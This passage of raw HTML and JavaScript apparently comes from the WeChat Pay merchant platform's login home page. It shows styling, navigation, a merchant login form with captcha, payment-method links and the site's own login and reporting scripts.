li.l05{margin-top:143px;margin-left:755px;} .through li.l06{margin-top:228px;margin-left:755px;} .guide-main{margin-top:37px;margin-bottom:5px;} .guide-main li{width:240px;height:266px;background-color:#FFFFFF;float:left;margin-right:21px;_margin-right:20px;text-align:center} .guide-main .guide-main-li-4{margin-right:0;} .guide-main li a{width:239px;height:266px;display:block;position:relative;border:1px solid #e5e5e5;} .guide-main li .title{display:block;color:#000000;font-size:16px;line-height:1;margin-top:25px;font-weight:normal} .guide-main li .info{display:block;color:#999999;font-size:12px;line-height:1;margin-top:14px;} .guide-main li .info .strong{font-weight:bold;} .guide-main-li-ico{margin-top:72px;-webkit-transition:margin-top 0.2s linear;-moz-transition:margin-top 0.2s linear;-ms-transition:margin-top 0.2s linear;-o-transition:margin-top 0.2s linear;transition:margin-top 0.2s linear;} .guide-main li .btngreen{display:none;margin:20px auto 0;width:191px;height:35px;line-height:35px;background-color:#00C800;font-size:14px;color:#FFFFFF;border-bottom:1px solid #00A000;} .guide-main li .btngray{background-color:#E6E6E6!important;color:#666666!important;border-bottom:1px solid #CCCCCC;} .guide-main-li-3 .tips{display:none;font-size:12px;color:#FF9900;line-height:1;} .guide-main-li-3 .tips .ico-info-orange{vertical-align:-3px;*vertical-align:1px;margin-right:5px;margin-top:12px;} .guide-main li a:hover{border:1px solid #00c800;text-decoration:none} .guide-main li a:hover .btngreen{display:block;} .guide-main li a:hover .tips{display:block;} .guide-main li a:hover .guide-main-li-ico{margin-top:45px;-webkit-transition:margin-top 0.2s linear;-moz-transition:margin-top 0.2s linear;-ms-transition:margin-top 0.2s linear;-o-transition:margin-top 0.2s linear;transition:margin-top 0.2s linear;} .guide-link{padding-top:120px;padding-bottom:58px;position:relative;height:24px;} .guide-link-a{color:#00C800;font-size:18px;height:24px;width:162px;} .guide-link-a .ico-arrow-right{vertical-align:-2px;*vertical-align:3px;margin-left:8px;cursor:pointer;} .guide-link-code{display:none;position:absolute;border:1px solid #C9C9C9;padding:6px;background-color:#FFFFFF;width:105px;height:105px;top:67px;left:50%;margin-left:90px;} .show-code .guide-link-code{display:block;} .show-code .ico-arrow-right{-webkit-transform:scale(-1, 1);-moz-transform:scale(-1, 1);-ms-transform:scale(-1, 1);-o-transform:scale(-1, 1);transform:scale(-1, 1);} /*图片轮播*/ .cms-banner{position:absolute;top:0;width:100%;height:410px;overflow:hidden; left:0} .cms-banner a{display:block;width:100%;height:410px;text-indent:-9999px;} .cms-banner ul li{position:absolute;top:0;width:100%;height:410px;background-position:center;background-repeat:no-repeat;} .cms-banner ol{position:absolute;z-index:9;bottom:0px;display:table;left:50%;margin-left:-73px;padding:16px 16px 16px 0;} .cms-banner ol li{float:left;width:10px;height:10px;margin-left:16px;text-indent:-9999px;background:#fff;border-radius:5px;overflow:hidden;} .cms-banner ol li.active{background:#44B549;} </style> </head> <body class="index" onclick="pgvWatchClick();"> <!-- 头部[[ --> <!-- 头部 [[ --> <script>var _speedMark=Date.now()</script> <!--小于ie7 跳转到错误页面 --> <!--[if lt IE 7]> <script> window.location.href='https://pay.weixin.qq.com/public/error/browser_tips'; </script> <![endif]--> <div class="topbar"> <div class="wrap"> <span onclick="pgvSendClick({hottag:'PAY.HOME.NAVI.CHINA_BUSINESS'});">境内业务</span> <i class="vs">|</i> <a onclick="pgvSendClick({hottag:'PAY.HOME.NAVI.INTERNATIONAL_BUSINESS'});" href="https://pay.weixin.qq.com/index.php/public/wechatpay" target="_blank">International business</a> </div> </div> <div class="header"> <div class="wrap"> <div class="logo"><h1><a href="/index.php/core/account" title="微信支付商户平台">微信支付商户平台</a></h1></div> <div class="link"> <a href="https://pay.weixin.qq.com/partner/public/home" target="_blank" onclick="pgvSendClick({hottag:'PAY.HOME.NAVI.SERVICE_PROVIDER'});"><strong class="hide">微信支付</strong>服务商</a> <i class="vs">|</i> <a href="https://pay.weixin.qq.com/wxzf_guide/index.shtml" target="_blank" onclick="pgvSendClick({hottag:'PAY.HOME.NAVI.WXZF_GUIDE'});"><strong class="hide">微信支付</strong>接入指引</a> <i class="vs">|</i> <a href="https://pay.weixin.qq.com/wiki/doc/api/index.php" target="_blank" onclick="pgvSendClick({hottag:'PAY.HOME.NAVI.API_DOC'});"><strong class="hide">微信支付</strong>开发文档</a> <i class="vs">|</i> <div class="pole-msg showPopUpJS"> <a class="content-us" href="javascript:;" onclick="pgvSendClick({hottag:'PAY.HOME.NAVI.HELP_CENTER'});">帮助中心<span class="dropdown-arrow"></span></a> <div class="popup"> <div class="inner"> <ul> <li> <p class="tel">客服：95017</p> <p>周一到周五 09:00-18:00</p> </li> <li class="bor-top"> <a href="http://kf.qq.com/product/wechatpaymentmerchant.html" target="_blank" onclick="pgvSendClick({hottag:'PAY.HOME.NAVI.QQ_KEFU'});">自助服务专区</a> </li> </ul> </div> </div> </div> </div> </div> </div> <script src="https://wx.gtimg.com/third/jquery/jquery-1.7.min.js"></script> <script type="text/javascript">if(typeof $jqueryUi == "undefined"){document.write('<script type="text/javascript" src="https://wx.gtimg.com/third/jquery/jquery-ui.js"></script"+">');}</script><script type="text/javascript" src="https://wx.gtimg.com/third/jquery/jquery-ui.js"></script"+"> <script>window["MCH.common.time"]=[new Date()]</script> <script id="legos:22195" ver="22195:20140901:20160908155731" name="MCH.common" src="https://wx.gtimg.com/mch/js/ver/2014/09/mch.common.20140901.js?t=20160908155731" charset="utf-8"></script><div class="mask-layer hide" id="header-masker"></div><!--[if !IE]>|xGv00|c95d265e97fcc54b235954b5b4a712f5<![endif]--> <script>window["MCH.header.time"]=[new Date()]</script> <script id="legos:22118" ver="22118:20140422:20160620111341" name="MCH.header" src="https://wx.gtimg.com/mch/js/ver/2014/04/mch.header.20140422.js?t=20160620111341" charset="utf-8"></script><!--[if !IE]>|xGv00|da289bab2d090281ed2476547ba6b944<![endif]--> <!-- 头部 ]] --><!--[if !IE]>|xGv00|73bbdddabec4f094fcae10c51db0f883<![endif]--> <!-- 头部 ]] --> <!-- 登录[[ --> <div class="banner"> <div class="cms-banner cms-area" id="cmspic_1000" home="true"><ul><li style="opacity: 0; z-index: 0; background-image: url(&quot;https://shp.qpic.cn/mmpay/oU5xbewRJutFViafoibhr5UHrDC2mbMGDZyLEY3icMbqS2o3BoicgX18HtuYicRR0fOJM/0&quot;);"><a target="_blank" href="https://pay.weixin.qq.com/public/qrcode_pay">banner</a></li><li style="opacity: 0.248188; z-index: 0; background-image: url(&quot;https://shp.qpic.cn/mmpay/oU5xbewRJuvfQibNQiaWz5VUDocbQSYYe3hM60YBT0t6AWkzDjcIFFgQxckUUn64nQ/0&quot;);"><a target="_blank" href="http://v.qq.com/x/cover/mv3e2ecbtloy44o.html?vid=u01960zjo7r">banner</a></li><li style="opacity: 0.751812; z-index: 1; background-image: url(&quot;https://shp.qpic.cn/mmpay/oU5xbewRJuv0wHAj5rxw34SXVgoycsicBB7zpopLBoGzl6S7EicZPsOPsyfj90NG2I/0&quot;);"><a target="_blank" href="http://v.qq.com/x/cover/mv3e2ecbtloy44o.html?vid=u01960zjo7r">banner</a></li><li style="opacity: 0; z-index: 0; background-image: url(&quot;https://shp.qpic.cn/mmpay/oU5xbewRJuupH9MJ5hbqw5sMmlyyn0UnUicF2UeHLKEkCO11MnS1DoXXicX3gOwfuK/0&quot;);"><a target="_blank" href="http://v.qq.com/x/cover/mv3e2ecbtloy44o.html?vid=u01960zjo7r">banner</a></li><li style="opacity: 0; z-index: 0; background-image: url(&quot;https://shp.qpic.cn/mmpay/oU5xbewRJuuZ81jvVm2RMN2C3hBE2oKW6UjJKs99mAZRxGOdCFYkyMU8NxHLDlLQ/0&quot;);"><a target="_blank" href="http://v.qq.com/x/cover/mv3e2ecbtloy44o.html?vid=u01960zjo7r">banner</a></li></ul><ol class="dots" style="opacity: 1; z-index: 1;"><li class="dot">1</li><li class="dot">2</li><li class="dot active">3</li><li class="dot">4</li><li class="dot">5</li></ol></div> <div class="wrap"> <div class="wrap-login"> <div class="login"> <div class="login-in"> <h2><span class="hide">微信支付</span>商户登录</h2> <div class="tips-warn clr hide" id="IDBrowserSafariTips"><i class="warn"></i><p>由于Safari浏览器安全策略，如密码输入出现异常，请根据指引修改Safari浏览器配置， <a href="/help_guide/login_guide.shtml" target="_blank">查看指引</a></p></div> <div class="tips-warn clr hide" id="IDBrowserMacChromeTips"><i class="warn"></i><p> 如密码输入出现异常，请根据指引修改浏览器配置， <a href="https://pay.weixin.qq.com/index.php/public/cms/content_detail?platformType=0&amp;lang=zh&amp;id=29000 " target="_blank">查看指引。</a></p></div> <div class="tips-error"><i class="ico-error"></i><p id="errmsg" style="color:red"></p></div> <!-- 交互说明 1. 给样式"login-form"添加样式"login-account-on",显示账号获焦效果 2. 给样式"login-form"添加样式"login-password-on",显示密码获焦效果 --> <form class="login-form login-password-on" action="/index.php/core/home/d_login_transition" method="post"> <div class="login-mainly"> <div class="login-account"><label class="ico-account" for="" title="登录帐号">登录帐号</label><input type="text" name="username" placeholder="登录帐号" id="idUserName"></div> <div class="login-password" id="mmpayPwdEdit"><label class="ico-password" for="" title="登录密码">登录密码</label><input type="password" name="password" placeholder="登录密码" id="idPassword"></div> </div> <input type="hidden" name="return_url" value="/index.php"> <input type="hidden" name="login_type" value="0"> <input id="token" type="hidden" name="ecc_csrf_token" value="2a9b085516b87f66cb0ca18a5453bdf4"> <div class="login-verify "><input type="text" name="checkword_in" maxlength="4" placeholder="验证码"><input type="hidden" name="need_check" value="1"><img class="img-verify change-verify" src="http://captcha.qq.com/getimage?aid=755049101&amp;rd=0.1314846018794924" style="height:40px;width:100px;"><a class="change-verify" href="#">换一张</a></div> </form> <div class="login-memory"><label id="memory_username_label" class="memory-account" for=""><i class="cbx" id="memory_username"></i>记住帐号</label><a class="forget-password" href="/index.php/public/reset_pass" onclick="pgvSendClick({hottag:'PAY.HOME.LOGIN_BOX.FORGET_PASSWORD'});">忘记密码？</a></div> <a class="btn-login" href="javascript:void(0);" id="do_login" onclick="pgvSendClick({hottag:'PAY.HOME.LOGIN_BOX.LOGIN_BUTTON'});">登录</a> </div> </div> <input id="seed" type="hidden" name="time_seed" value="31343839353931393137"> </div> </div> </div> <!-- 登录 ]] --> <!-- 内容[[ --> <div class="container"> <div class="wrap"> <!-- 最新公告[[ --> <div class="cms-notice cms-area clr" id="cmsanm_6000" home="true" link-list-id="6200"><h2>最新公告</h2><ul><li><span class="time">[03.15]</span><a target="_blank" href="/index.php/public/cms/content_detail?lang=zh&amp;id=36602" title="3月16-17日微信支付退款业务升级维护通知">3月16-17日微信支付退款业务升级维护通知</a><i class="ico-new"></i></li><li><span class="time">[02.10]</span><a target="_blank" href="/index.php/public/cms/content_detail?lang=zh&amp;id=41201" title="微信支付企业付款业务调整公告">微信支付企业付款业务调整公告</a></li><li><span class="time">[11.30]</span><a target="_blank" href="/index.php/public/cms/content_detail?lang=zh&amp;id=30001" title="《商户平台使用手册》正式上线">《商户平台使用手册》正式上线</a></li></ul><p class="more"><a href="/public/cms/content_list?lang=zh&amp;id=6200" target="_blank">更多公告&gt;&gt;</a></p></div> <!-- 最新公告 ]] --> <!-- 四大支付方式[[ --> <div class="title clr"> <h2>接入微信支付</h2> </div> <div class="function clr"> <ul class="guide-main clr"> <li class="guide-main-li-1"> <a href="http://kf.qq.com/faq/120911VrYVrA150905zeYjMZ.html" target="_blank" onclick="pgvSendClick({hottag:'PAY.HOME.APPLY.IN_APP_WEB'});"> <span class="guide-main-li-ico ico-mp"></span> <h3 class="title">公众号支付</h3> <p class="info">在微信内的商家页面上完成<em>公众号支付</em></p> <span class="btngreen">我要接入</span> </a> </li> <li class="guide-main-li-2"> <a href="http://kf.qq.com/faq/120911VrYVrA150906F3qqY3.html" target="_blank" onclick="pgvSendClick({hottag:'PAY.HOME.APPLY.IN_APP'});"> <span class="guide-main-li-ico ico-app"></span> <h3 class="title">APP支付</h3> <p class="info">在APP中，调起微信进行<em>APP支付</em></p> <span class="btngreen">我要接入</span> </a> </li> <li class="guide-main-li-3"> <a href="http://kf.qq.com/faq/120911VrYVrA150906yUZze6.html" target="_blank" onclick="pgvSendClick({hottag:'PAY.HOME.APPLY.QR_CODE'});"> <span class="guide-main-li-ico ico-code"></span> <h3 class="title">扫码支付</h3> <p class="info">扫描二维码进行<em>扫码支付</em></p> <span class="btngreen">我要接入</span> </a> </li> <li class="guide-main-li-4"> <a href="http://kf.qq.com/faq/120911VrYVrA150906iQjQjI.html" target="_blank" onclick="pgvSendClick({hottag:'PAY.HOME.APPLY.QUICK_PAY'});"> <span class="guide-main-li-ico ico-shuaka"></span> <h3 class="title">刷卡支付</h3> <p class="info">用户展示条码，商户扫描完成<em>刷卡支付</em></p> <span class="btngreen">我要接入</span> </a> </li> </ul> </div> <!-- 四大支付方式 ]] --> <!-- 微信支付商户通[[ --> <div class="title clr"> <h2>微信支付商户通</h2> </div> <div class="through"> <ul> <li class="l01">如何快速接入<strong>微信支付</strong>？</li> <li class="l02">了解最新的<strong>支付技术接口</strong>？</li> <li class="l03"><strong>微信商户</strong>后台操作有疑问？</li> <li class="l04"><strong>微信现金红包</strong>怎么玩？</li> <li class="l05">掌握最新的<strong>微信行业解决方案</strong>？</li> <li class="l06">获取一手的<strong>微信支付官方动态</strong>？</li> </ul> </div> <!-- 微信支付商户通 ]] --> </div> </div> <!-- 内容 ]] --> <script src="https://www.tenpay.com/v2/res/js/global/tenpayctrl_v2-min.js"></script> <script>window["MCH.tenpaycertV2.time"]=[new Date()]</script> <script id="legos:22410" ver="22410:20151023:20170106102318" name="MCH.tenpaycertV2" src="https://wx.gtimg.com/mch/js/ver/2015/10/mch.tenpaycertV2.20151023.js?t=20170106102318" charset="utf-8"></script><!--[if !IE]>|xGv00|09219d01d9d2312179afd1ffbb55230b<![endif]--><!--[if !IE]>|xGv00|8ab59df4495293a71573934cfa4d640c<![endif]--> <script>window["MCH.home.time"]=[new Date()]</script> <script id="legos:22134" ver="22134:20140516:20170105201629" name="MCH.home" charset="utf-8"> window['MCH.home.time'] && window['MCH.home.time'].push(new Date()); function $addToken(url,type,skey){var token=$getToken(skey);if(url==""||(url.indexOf("://")<0?location.href:url).indexOf("http")!=0){return url;} if(url.indexOf("#")!=-1){var f1=url.match(/\?.+\#/);if(f1){var t=f1[0].split("#"),newPara=[t[0],"&g_tk=",token,"&g_ty=",type,"#",t[1]].join("");return url.replace(f1[0],newPara);}else{var t=url.split("#");return[t[0],"?g_tk=",token,"&g_ty=",type,"#",t[1]].join("");}} return token==""?(url+(url.indexOf("?")!=-1?"&":"?")+"g_ty="+type):(url+(url.indexOf("?")!=-1?"&":"?")+"g_tk="+token+"&g_ty="+type);};var $ajax=(function(window,undefined){var oXHRCallbacks,xhrCounter=0;var fXHRAbortOnUnload=window.ActiveXObject?function(){for(var key in oXHRCallbacks){oXHRCallbacks[key](0,1);}}:false;return function(opt){var o={url:'',method:'GET',data:null,type:"text",async:true,cache:false,timeout:0,autoToken:true,username:'',password:'',beforeSend:$empty(),onSuccess:$empty(),onError:$empty(),onComplete:$empty()};for(var key in opt){o[key]=opt[key]} var callback,timeoutTimer,xhrCallbackHandle,ajaxLocation,ajaxLocParts;try{ajaxLocation=location.href;} catch(e){ajaxLocation=document.createElement("a");ajaxLocation.href="";ajaxLocation=ajaxLocation.href;} ajaxLocParts=/^([\w\+\.\-]+:)(?:\/\/([^\/?#:]*)(?::(\d+)|)|)/.exec(ajaxLocation.toLowerCase())||[];o.isLocal=/^(?:about|app|app\-storage|.+\-extension|file|res|widget):$/.test(ajaxLocParts[1]);o.method=(typeof(o.method)!="string"||o.method.toUpperCase()!="POST")?"GET":"POST";o.data=(typeof o.data=="string")?o.data:$makeUrl(o.data);if(o.method=='GET'&&o.data){o.url+=(o.url.indexOf("?")<0?"?":"&")+o.data;} if(o.autoToken){o.url=$addToken(o.url,"ajax");} o.xhr=$xhrMaker();if(o.xhr===null){return false;} try{if(o.username){o.xhr.open(o.method,o.url,o.async,o.username,o.password);} else{o.xhr.open(o.method,o.url,o.async);}} catch(e){o.onError(-2,e);return false;} if(o.method=='POST'){o.xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');} if(!o.cache){o.xhr.setRequestHeader('If-Modified-Since','Thu, 1 Jan 1970 00:00:00 GMT');o.xhr.setRequestHeader('Cache-Control','no-cache');} o.beforeSend(o.xhr);if(o.async&&o.timeout>0){if(o.xhr.timeout===undefined){timeoutTimer=setTimeout(function(){if(o.xhr&&callback){callback(0,1);} o.onError(0,null,'timeout');},o.timeout);} else{o.xhr.timeout=o.timeout;o.xhr.ontimeout=function(){if(o.xhr&&callback){callback(0,1);} o.onError(0,null,'timeout');};}} o.xhr.send(o.method=='POST'?o.data:null);callback=function(e,isAbort){if(timeoutTimer){clearTimeout(timeoutTimer);timeoutTimer=undefined;} if(callback&&(isAbort||o.xhr.readyState===4)){callback=undefined;if(xhrCallbackHandle){o.xhr.onreadystatechange=$empty();if(fXHRAbortOnUnload){try{delete oXHRCallbacks[xhrCallbackHandle];} catch(e){}}} if(isAbort){if(o.xhr.readyState!==4){o.xhr.abort();}} else{var status,statusText,responses;responses={headers:o.xhr.getAllResponseHeaders()};status=o.xhr.status;try{statusText=o.xhr.statusText;} catch(e){statusText="";} try{responses.text=o.xhr.responseText;} catch(e){responses.text="";} if(!status&&o.isLocal){status=responses.text?200:404;} else if(status===1223){status=204;} if(status>=200&&status<300){responses.text=responses.text.replace(/<!--\[if !IE\]>[\w\|]+<!\[endif\]-->/g,'');switch(o.type){case'text':o.onSuccess(responses.text);break;case"json":var json;try{json=(new Function("return ("+responses.text+")"))();} catch(e){o.onError(status,e,responses.text);} if(json){o.onSuccess(json);} break;case"xml":o.onSuccess(o.xhr.responseXML);break;}} else{if(status===0&&o.timeout>0){o.onError(status,null,'timeout');} else{o.onError(status,null,statusText);}} o.onComplete(status,statusText,responses);} delete o.xhr;}};if(!o.async){callback();} else if(o.xhr.readyState===4){setTimeout(callback,0);} else{xhrCallbackHandle=++xhrCounter;if(fXHRAbortOnUnload){if(!oXHRCallbacks){oXHRCallbacks={};if(window.attachEvent){window.attachEvent("onunload",fXHRAbortOnUnload);} else{window["onunload"]=fXHRAbortOnUnload;}} oXHRCallbacks[xhrCallbackHandle]=callback;} o.xhr.onreadystatechange=callback;}};})(window,undefined);function $empty(){return function(){return true;}};function $getCookie(name){var reg=new RegExp("(^| )"+name+"(?:=([^;]*))?(;|$)"),val=document.cookie.match(reg);return val?(val[2]?unescape(val[2]):""):null;};function $getToken(skey){var skey=skey?skey:$getCookie("skey");return skey?$time33(skey):"";};function $makeUrl(data){var arr=[];for(var k in data){arr.push(k+"="+data[k]);};return arr.join("&");};function $namespace(name){for(var arr=name.split(','),r=0,len=arr.length;r<len;r++){for(var i=0,k,name=arr[r].split('.'),parent={};k=name[i];i++){i===0?eval('(typeof '+k+')==="undefined"?('+k+'={}):"";parent='+k):(parent=parent[k]=parent[k]||{});}}};function $setCookie(name,value,expires,path,domain,secure){var exp=new Date(),expires=arguments[2]||null,path=arguments[3]||"/",domain=arguments[4]||null,secure=arguments[5]||false;expires?exp.setMinutes(exp.getMinutes()+parseInt(expires)):"";document.cookie=name+'='+escape(value)+(expires?';expires='+exp.toGMTString():'')+(path?';path='+path:'')+(domain?';domain='+domain:'')+(secure?';secure':'');};function $strTrim(str,code){var argus=code||"\\s";var temp=new RegExp("(^"+argus+"*)|("+argus+"*$)","g");return str.replace(temp,"");};function $time33(str){for(var i=0,len=str.length,hash=5381;i<len;++i){hash+=(hash<<5)+str.charAt(i).charCodeAt();};return hash&0x7fffffff;};function $xhrMaker(){var xhr;try{xhr=new XMLHttpRequest();}catch(e){try{xhr=new ActiveXObject("Msxml2.XMLHTTP");}catch(e){try{xhr=new ActiveXObject("Microsoft.XMLHTTP");}catch(e){xhr=null;}}};return xhr;};$namespace("MCH.home");MCH.home={tenpayEdit:''};MCH.home.init=function(){homeThat=this;homeThat.tenpayEdit=new MCH.mmpayEdit({bindObjId:"mmpayPwdEdit",width:258,height:44},{isShowFunc:MCH.home.isShowFunc,returnCallBack:MCH.home.editShowReturn},this);this.bind();Common.exdAttrBrowser();};MCH.home.isShowFunc=function(){var username=$strTrim($(".login-form").find("input[name=username]").val());if(Common.isTenpayMchByName(username)){return true;}else{return false;}};MCH.home.editShowReturn=function(editRet){var browserFunc=function(){var sys=Common.getBrowserVersion();if(sys.osType=="mac"&&sys.browserName=="Safari"){$("#IDBrowserSafariTips").removeClass("hide");}else if(sys.osType=="mac"&&sys.browserName=="Chrome"&&sys.browserVersion>="47"){$("#IDBrowserMacChromeTips").removeClass("hide");}else if(sys.osType=="windows"&&sys.browserName!="IE"){$("#IDBrowserMacChromeTips").removeClass("hide");}};try{var version=editRet.editObj.ctrl.Version.toString();if(version&&(version>1206)){return true;}else{browserFunc();}}catch(e){browserFunc();}};MCH.home.focus_fuc=function(){$(".login-form").removeClass("login-account-on");$(".login-form").addClass("login-password-on");};MCH.home.blur_fuc=function(){$(".login-form").removeClass("login-password-on");};MCH.home.enter_fuc=function(){return null;};MCH.home.ossAttrIncAPI=function(id,key){var postData='id='+id+'&key='+key;$ajax({url:'/webreport/ossattrapi',data:postData,method:'post',type:'json',async:true,onSuccess:function(data){},onError:function(msg){}});};MCH.home.userNameBlur=function(){var username=$(".login-form").find("input[name=username]").val();var length=username.length;switch(length){case 0:MCH.home.ossAttrIncAPI(63769,18);break;case 1:MCH.home.ossAttrIncAPI(63769,19);break;case 2:MCH.home.ossAttrIncAPI(63769,20);break;case 3:MCH.home.ossAttrIncAPI(63769,21);break;case 4:MCH.home.ossAttrIncAPI(63769,22);break;case 5:MCH.home.ossAttrIncAPI(63769,23);break;case 6:MCH.home.ossAttrIncAPI(63769,24);break;case 7:MCH.home.ossAttrIncAPI(63769,25);break;case 8:MCH.home.ossAttrIncAPI(63769,26);break;case 9:MCH.home.ossAttrIncAPI(63769,27);break;case 10:MCH.home.ossAttrIncAPI(63769,28);break;default:MCH.home.ossAttrIncAPI(63769,29);break;} var ua=navigator.userAgent.toLowerCase();var reg=/[Aa]ndroid/;if(reg.test(ua)){MCH.home.ossAttrIncAPI(63769,31);}else{MCH.home.ossAttrIncAPI(63769,32);}};MCH.home.bind=function(){$("input[name=username]").focus();if($getCookie("username")){MCH.home.ossAttrIncAPI(63769,30);$("input[name=username]").val($getCookie("username"));$("#memory_username").addClass('cbx-on');} $("input[name=username]").on('focus',function(){MCH.home.ossAttrIncAPI(63769,17);$(".login-form").removeClass("login-password-on");$(".login-form").addClass("login-account-on");});$("input[name=password]").on('focus',function(){$(".login-form").removeClass("login-account-on");$(".login-form").addClass("login-password-on");homeThat.tenpayEdit.show();});$("input[name=username]").on('blur',function(){MCH.home.userNameBlur();$(".login-form").removeClass("login-account-on");$(".login-form").addClass("login-password-on");homeThat.tenpayEdit.show();});$("#memory_username_label").on('click',function(){if($('#memory_username').hasClass('cbx-on')){$('#memory_username').removeClass('cbx-on');}else{$('#memory_username').addClass('cbx-on');}});$("#do_login").on('click',function(){$("#errmsg").text("").addClass('hide');var temp_usrname=$(".login-form").find("input[name=username]").val();$(".login-form").find("input[name=username]").val($strTrim(temp_usrname));if($("#memory_username").hasClass('cbx-on')){$setCookie('username',$("input[name=username]").val(),'3600');}else{$setCookie('username',$("input[name=username]").val());} var username=$(".login-form").find("input[name=username]").val();var password=$(".login-form").find("input[name=password]").val();password=homeThat.tenpayEdit.getPwd();if(username&&password){password=Common.encryptPassword(password);if($(".login-verify").html()){if($("input[name=checkword_in]").val()){if($("input[name=checkword_in]").val().length!=4){$("#errmsg").text('请检查验证码').removeClass('hide');}else{$(".login-form").find("input[name=password]").val(password);$(".login-form").submit();}} else{$("#errmsg").text('请输入验证码').removeClass('hide');}}else{$(".login-form").find("input[name=password]").val(password);$(".login-form").submit();}}else{if(username.length==0&&password===false){$("#errmsg").text('请输入帐号和密码').removeClass('hide');}else if(username.length==0){$("#errmsg").text('请输入登录帐号').removeClass('hide');}else{$("#errmsg").text(homeThat.tenpayEdit.errmsg).removeClass('hide');}}});};MCH.home.init(); window['MCH.home']='22134:20140516:20170105201629'; window['MCH.home.time'] && window['MCH.home.time'].push(new Date()); </script><!--[if !IE]>|xGv00|6f5e5c77fe153f6e42ad173204c021c5<![endif]--> <script>window["MCH.cms.time"]=[new Date()]</script> <script id="legos:22392" ver="22392:20151027:20160810123858" name="MCH.cms" src="https://wx.gtimg.com/mch/js/ver/2015/10/mch.cms.20151027.js?t=20160810123858" charset="utf-8"></script><!--[if !IE]>|xGv00|b299de016a6e1f795625ccbc51c6c029<![endif]--> <!-- 底部[[ --> <div class="footer"> <div class="wrap"> <p> <a target="_blank" href="http://help.tenpay.com/cgi-bin/helpcenter/help_center.cgi?id=1&amp;type=0">关于财付通</a> <i class="vs">|</i> <a target="_blank" href="https://pay.weixin.qq.com/index.php/core/home/pay_pact_v4">平台使用协议</a> <i class="vs">|</i> <a href="https://pay.weixin.qq.com/index.php/public/apply_sign/protocol_v2" target="_blank">支付服务协议</a> <i class="vs">|</i> Powered By Tencent &amp; Tenpay　Copyright© 2005-<script> var year=""; mydate=new Date(); myyear=mydate.getYear(); year=(myyear > 200) ? myyear : 1900 + myyear; document.write(year); </script>2017 Tenpay All Rights Reserved. </p> <p> <a target="_blank" href="http://weixin.qq.com/">微信</a> <i class="vs">|</i> <a target="_blank" href="https://mp.weixin.qq.com/">微信公众平台</a> <i class="vs">|</i> <a target="_blank" href="https://open.weixin.qq.com/">微信开放平台</a> <i class="vs">|</i> <a target="_blank" href="http://e.qq.com/">广点通</a> <i class="vs">|</i> <a target="_blank" href="http://open.qq.com/">腾讯开放平台</a> </p> </div> </div> <script type="text/javascript">if(typeof $jqueryUi == "undefined"){document.write('<script type="text/javascript" src="https://wx.gtimg.com/third/jquery/jquery-ui.js"></script"+">');}</script><script type="text/javascript" src="https://wx.gtimg.com/third/jquery/jquery-ui.js"></script"+"> <script>window["MCH.footer.time"]=[new Date()]</script> <script id="legos:22125" ver="22125:20140422:20161206161027" name="MCH.footer" charset="utf-8"> window['MCH.footer.time'] && window['MCH.footer.time'].push(new Date()); function $addToken(url,type,skey){var token=$getToken(skey);if(url==""||(url.indexOf("://")<0?location.href:url).indexOf("http")!=0){return url;} if(url.indexOf("#")!=-1){var f1=url.match(/\?.+\#/);if(f1){var t=f1[0].split("#"),newPara=[t[0],"&g_tk=",token,"&g_ty=",type,"#",t[1]].join("");return url.replace(f1[0],newPara);}else{var t=url.split("#");return[t[0],"?g_tk=",token,"&g_ty=",type,"#",t[1]].join("");}} return token==""?(url+(url.indexOf("?")!=-1?"&":"?")+"g_ty="+type):(url+(url.indexOf("?")!=-1?"&":"?")+"g_tk="+token+"&g_ty="+type);};var $ajax=(function(window,undefined){var oXHRCallbacks,xhrCounter=0;var fXHRAbortOnUnload=window.ActiveXObject?function(){for(var key in oXHRCallbacks){oXHRCallbacks[key](0,1);}}:false;return function(opt){var o={url:'',method:'GET',data:null,type:"text",async:true,cache:false,timeout:0,autoToken:true,username:'',password:'',beforeSend:$empty(),onSuccess:$empty(),onError:$empty(),onComplete:$empty()};for(var key in opt){o[key]=opt[key]} var callback,timeoutTimer,xhrCallbackHandle,ajaxLocation,ajaxLocParts;try{ajaxLocation=location.href;} catch(e){ajaxLocation=document.createElement("a");ajaxLocation.href="";ajaxLocation=ajaxLocation.href;} ajaxLocParts=/^([\w\+\.\-]+:)(?:\/\/([^\/?#:]*)(?::(\d+)|)|)/.exec(ajaxLocation.toLowerCase())||[];o.isLocal=/^(?:about|app|app\-storage|.+\-extension|file|res|widget):$/.test(ajaxLocParts[1]);o.method=(typeof(o.method)!="string"||o.method.toUpperCase()!="POST")?"GET":"POST";o.data=(typeof o.data=="string")?o.data:$makeUrl(o.data);if(o.method=='GET'&&o.data){o.url+=(o.url.indexOf("?")<0?"?":"&")+o.data;} if(o.autoToken){o.url=$addToken(o.url,"ajax");} o.xhr=$xhrMaker();if(o.xhr===null){return false;} try{if(o.username){o.xhr.open(o.method,o.url,o.async,o.username,o.password);} else{o.xhr.open(o.method,o.url,o.async);}} catch(e){o.onError(-2,e);return false;} if(o.method=='POST'){o.xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');} if(!o.cache){o.xhr.setRequestHeader('If-Modified-Since','Thu, 1 Jan 1970 00:00:00 GMT');o.xhr.setRequestHeader('Cache-Control','no-cache');} o.beforeSend(o.xhr);if(o.async&&o.timeout>0){if(o.xhr.timeout===undefined){timeoutTimer=setTimeout(function(){if(o.xhr&&callback){callback(0,1);} o.onError(0,null,'timeout');},o.timeout);} else{o.xhr.timeout=o.timeout;o.xhr.ontimeout=function(){if(o.xhr&&callback){callback(0,1);} o.onError(0,null,'timeout');};}} o.xhr.send(o.method=='POST'?o.data:null);callback=function(e,isAbort){if(timeoutTimer){clearTimeout(timeoutTimer);timeoutTimer=undefined;} if(callback&&(isAbort||o.xhr.readyState===4)){callback=undefined;if(xhrCallbackHandle){o.xhr.onreadystatechange=$empty();if(fXHRAbortOnUnload){try{delete oXHRCallbacks[xhrCallbackHandle];} catch(e){}}} if(isAbort){if(o.xhr.readyState!==4){o.xhr.abort();}} else{var status,statusText,responses;responses={headers:o.xhr.getAllResponseHeaders()};status=o.xhr.status;try{statusText=o.xhr.statusText;} catch(e){statusText="";} try{responses.text=o.xhr.responseText;} catch(e){responses.text="";} if(!status&&o.isLocal){status=responses.text?200:404;} else if(status===1223){status=204;} if(status>=200&&status<300){responses.text=responses.text.replace(/<!--\[if !IE\]>[\w\|]+<!\[endif\]-->/g,'');switch(o.type){case'text':o.onSuccess(responses.text);break;case"json":var json;try{json=(new Function("return ("+responses.text+")"))();} catch(e){o.onError(status,e,responses.text);} if(json){o.onSuccess(json);} 